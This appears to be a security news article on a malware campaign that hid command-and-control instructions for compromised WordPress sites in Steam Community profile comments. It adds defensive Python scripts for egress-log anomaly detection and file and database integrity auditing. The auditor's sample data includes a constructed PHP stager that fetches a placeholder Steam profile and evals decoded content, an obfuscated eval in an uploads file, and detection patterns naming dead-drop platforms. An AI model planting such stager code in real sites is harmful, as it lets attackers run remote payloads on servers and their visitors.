A newly discovered malware campaign has compromised close to 2,000 WordPress websites by leveraging an unlikely hiding place for its command-and-control infrastructure: Steam Community profile comments. The technique exploits the trust that network security tools and system administrators place in Valve's popular gaming platform to silently deliver malicious payloads.
The campaign was uncovered by security researchers at Sucuri, as reported by BleepingComputer on 1 June. According to the findings, attackers inject malicious code into compromised WordPress sites that reaches out to an attacker-controlled Steam Community profile to retrieve its operational instructions — turning a mainstream gaming platform into a covert communication channel.
How the Attack Works
The malware planted on infected WordPress sites contains JavaScript or PHP code that makes requests to a Steam Community profile page controlled by the attacker. Hidden within that profile's comment section are encoded strings that function as commands or payload fragments. Because Steam is a widely trusted, legitimate domain — and its community pages accept user-generated content with minimal filtering — the requests typically sail past firewall rules, content security policies, and blocklist-based detection systems without raising flags.
Once the infected site retrieves the encoded data from the Steam profile comments, the malicious code decodes it and executes whatever instructions it contains. Those instructions could range from redirecting visitors to phishing pages to injecting cryptocurrency miners or deploying additional malware payloads.
The use of Steam as a C2 intermediary is notable for its simplicity and effectiveness. Security teams routinely whitelist major platforms like Steam, and the volume of legitimate traffic to steamcommunity.com makes anomalous requests extremely difficult to spot in network logs.
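The detection gap described above, illustrated with an added example that is not part of the original article or of Sucuri's research: a small Python checker that reads egress-log lines from a WordPress host and flags any request made by a server-side process (php-fpm, curl and the like) to a destination outside the host's expected update baseline. A destination being a widely allowlisted platform such as steamcommunity.com is treated as a reason for more suspicion, not less, and repeated fetches of one identical URL are reported as possible beaconing. The log format, the baseline and process lists, and the profile URL are all assumptions; the log lines are constructed.

```python
"""Flag server-side outbound requests from a WordPress host that fall outside
its expected egress baseline, regardless of how reputable the domain is.
Assumed log format (constructed): '<ts> <user> <process> <method> <url>'."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Assumed baseline: what a WordPress server's PHP workers legitimately reach
# (core/plugin update checks). Anything else from those workers is anomalous.
EXPECTED_EGRESS = {"api.wordpress.org", "downloads.wordpress.org", "wordpress.org"}

# Domains that perimeter allowlists commonly pass through. Being on this list
# is not a reason to trust the request; it is what makes dead-drop C2 work.
WIDELY_ALLOWLISTED = {"steamcommunity.com", "github.com", "pastebin.com",
                      "t.me", "api.telegram.org"}

# Processes whose outbound traffic originates from the application, not a person.
SERVER_SIDE_PROCESSES = {"php-fpm", "php", "curl", "wget"}

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<user>\S+) (?P<proc>\S+) "
                     r"(?P<method>[A-Z]+) (?P<url>\S+)$")


def _matches(host, domains):
    return host in domains or any(host.endswith("." + d) for d in domains)


def parse_line(line):
    """Parse one log line into a dict, or None if it does not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["host"] = urlsplit(rec["url"]).hostname or ""
    return rec


def classify(rec):
    """Return the reasons a record is suspicious; an empty list means benign."""
    if rec["proc"] not in SERVER_SIDE_PROCESSES:
        return []  # browser or admin traffic is out of scope for this check
    host = rec["host"]
    if _matches(host, EXPECTED_EGRESS):
        return []
    reasons = [f"server-side process {rec['proc']} reached non-baseline host {host}"]
    if _matches(host, WIDELY_ALLOWLISTED):
        reasons.append("destination is a commonly allowlisted platform "
                       "(possible dead-drop C2)")
    return reasons


def detect_beaconing(records, min_hits=3):
    """Identical URLs fetched repeatedly by server-side processes."""
    counts = Counter(r["url"] for r in records if r["proc"] in SERVER_SIDE_PROCESSES)
    return {url: n for url, n in counts.items() if n >= min_hits}


def analyse(lines):
    """Run both checks over raw log lines and return alerts plus beacon candidates."""
    records = [r for r in map(parse_line, lines) if r]
    alerts = []
    for r in records:
        reasons = classify(r)
        if reasons:
            alerts.append((r["ts"], r["url"], reasons))
    return {"alerts": alerts, "beacons": detect_beaconing(records)}


# Constructed sample: one update check, three periodic profile fetches by the
# PHP worker, one human browsing Steam, one plugin download. PLACEHOLDER_ID is
# not a real profile.
SAMPLE_LOG = """\
2025-06-01T10:00:01Z www-data php-fpm GET https://api.wordpress.org/core/version-check/1.7/
2025-06-01T10:00:05Z www-data php-fpm GET https://steamcommunity.com/profiles/PLACEHOLDER_ID/
2025-06-01T10:05:05Z www-data php-fpm GET https://steamcommunity.com/profiles/PLACEHOLDER_ID/
2025-06-01T10:10:05Z www-data php-fpm GET https://steamcommunity.com/profiles/PLACEHOLDER_ID/
2025-06-01T10:11:00Z alice firefox GET https://steamcommunity.com/app/730/
2025-06-01T10:12:00Z www-data php-fpm GET https://downloads.wordpress.org/plugin/akismet.zip
"""

if __name__ == "__main__":
    result = analyse(SAMPLE_LOG.splitlines())
    for ts, url, reasons in result["alerts"]:
        print(ts, url, "; ".join(reasons))
    print("beacon candidates:", result["beacons"])
```

The design point is that the check keys on who made the request and whether the destination is in the host's own baseline; the reputation of the domain never makes a request benign. Applied to a real egress log, the baseline would be learned from the host's update traffic rather than hard-coded, and the five-minute cadence visible in the sample is the kind of regularity worth surfacing separately.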
Why Traditional Defences Fall Short
The campaign exposes a fundamental weakness in perimeter-based and signature-driven security approaches. Static blocklists cannot account for every legitimate service that an attacker might co-opt, and whitelisting trusted domains creates blind spots that sophisticated adversaries are increasingly eager to exploit.
Sucuri's research notes that this is not the first time attackers have abused well-known platforms for C2 purposes — services like Telegram, GitHub, and even Pastebin have been used similarly. However, the use of Steam Community profile comments is a relatively novel twist that broadens the attack surface.
For WordPress site operators, the campaign underscores the importance of keeping CMS installations, themes, and plugins fully patched. Many of the nearly 2,000 compromised sites likely fell victim through known vulnerabilities in outdated or abandoned plugins — a persistent problem across the WordPress ecosystem, where maintenance quality and update frequency vary wildly from one plugin to the next. Keeping a tight, well-curated plugin inventory is as important as patching itself.
The Bigger Picture
The technique reflects a broader trend in the threat landscape: attackers are shifting away from infrastructure they control directly and instead piggybacking on trusted third-party services. This makes attribution harder, takedowns more complicated, and detection far more challenging for defenders relying on conventional tools.
Organisations running WordPress should prioritise integrity monitoring of core files and database content, implement behavioural analysis capable of flagging outbound requests to unusual destinations — even when those destinations are trusted domains — and audit their sites regularly for injected scripts. In a threat environment where even a gaming platform's comment section can serve as an attack vector, proactive anomaly detection has become essential rather than optional.
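One way to carry out two of the recommendations above, integrity monitoring of files and database content and auditing for injected scripts, in a single pass, as an added example that is neither Sucuri's tooling nor WordPress core code: the script compares current file hashes with a stored baseline and then scans both files and option values for a small set of injection indicators (dynamic evaluation, obfuscation decoders, remote fetches, references to third-party dead-drop platforms, external script tags, long base64 blobs). In-memory dicts stand in for the filesystem and the wp_options table so it runs offline; the indicator list, the baseline format and the injected snippet with its PLACEHOLDER_ID are all constructed assumptions.

```python
"""Integrity baseline plus injected-code audit for a WordPress install.
Files and database rows are constructed in-memory stand-ins; the indicator
patterns and baseline format are assumptions made for this example."""
import hashlib
import re

# Each indicator is (name, compiled regex). Order determines report order.
INDICATORS = [
    ("dynamic-eval", re.compile(r"\beval\s*\(")),
    ("obfuscation-decode",
     re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(")),
    ("remote-fetch",
     re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://")),
    ("third-party-dead-drop",
     re.compile(r"https?://(www\.)?(steamcommunity\.com|pastebin\.com|t\.me|"
                r"api\.telegram\.org|raw\.githubusercontent\.com)/", re.I)),
    ("external-script-tag", re.compile(r"<script[^>]+src=['\"]https?://", re.I)),
    ("long-base64-blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")),
]


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def integrity_diff(files, baseline):
    """Compare current contents (path -> text) with a baseline (path -> sha256)."""
    changed = sorted(p for p, c in files.items() if p in baseline and baseline[p] != sha256(c))
    added = sorted(p for p in files if p not in baseline)
    missing = sorted(p for p in baseline if p not in files)
    return {"changed": changed, "added": added, "missing": missing}


def scan_content(label, text):
    """Return (label, [indicator names]) when any indicator fires, else None."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return (label, hits) if hits else None


def audit(files, db_rows, baseline):
    """Integrity diff plus indicator hits across files and database values."""
    findings = []
    for path, content in files.items():
        hit = scan_content(path, content)
        if hit:
            findings.append(hit)
    for key, value in db_rows.items():
        hit = scan_content(f"db:{key}", value)
        if hit:
            findings.append(hit)
    return {"integrity": integrity_diff(files, baseline), "injections": findings}


# Constructed sample data. CLEAN_INDEX mirrors the shape of a stock index.php;
# INJECTED_INDEX appends a one-line stager-style snippet so the scanner has
# something to find. PLACEHOLDER_ID is not a real Steam profile.
CLEAN_INDEX = ("<?php\n/** Front to the WordPress application. */\n"
               "define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n")
INJECTED_INDEX = CLEAN_INDEX + (
    "$c=file_get_contents('https://steamcommunity.com/profiles/PLACEHOLDER_ID/');"
    "eval(base64_decode($c));\n")
CLEAN_CONFIG = "<?php define('DB_NAME', 'wp');"

SAMPLE_FILES = {
    "index.php": INJECTED_INDEX,
    "wp-content/uploads/x.php": "<?php eval(gzinflate(base64_decode('AAAA')));",
    "wp-config.php": CLEAN_CONFIG,
}
# Baseline as recorded at install time; hello.php is present in the baseline
# but absent from the current tree, so it shows up as missing.
SAMPLE_BASELINE = {
    "index.php": sha256(CLEAN_INDEX),
    "wp-config.php": sha256(CLEAN_CONFIG),
    "wp-content/plugins/hello.php": "placeholder-hash-of-hello-dolly",
}
SAMPLE_DB = {
    "wp_options.siteurl": "https://example.org",
    "wp_options.widget_text":
        "<script src='https://steamcommunity.com/profiles/PLACEHOLDER_ID/'></script>",
}

if __name__ == "__main__":
    report = audit(SAMPLE_FILES, SAMPLE_DB, SAMPLE_BASELINE)
    print("integrity:", report["integrity"])
    for label, hits in report["injections"]:
        print(f"{label}: {', '.join(hits)}")
```

Run against a real install, the file dict would be built by walking the document root and the database rows by selecting option values and post content, with the baseline captured immediately after a clean install or update. The two checks are deliberately complementary: the integrity diff catches a modified core file even when the injected code matches no indicator, and the indicator scan catches injected database content that no file hash would ever cover.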
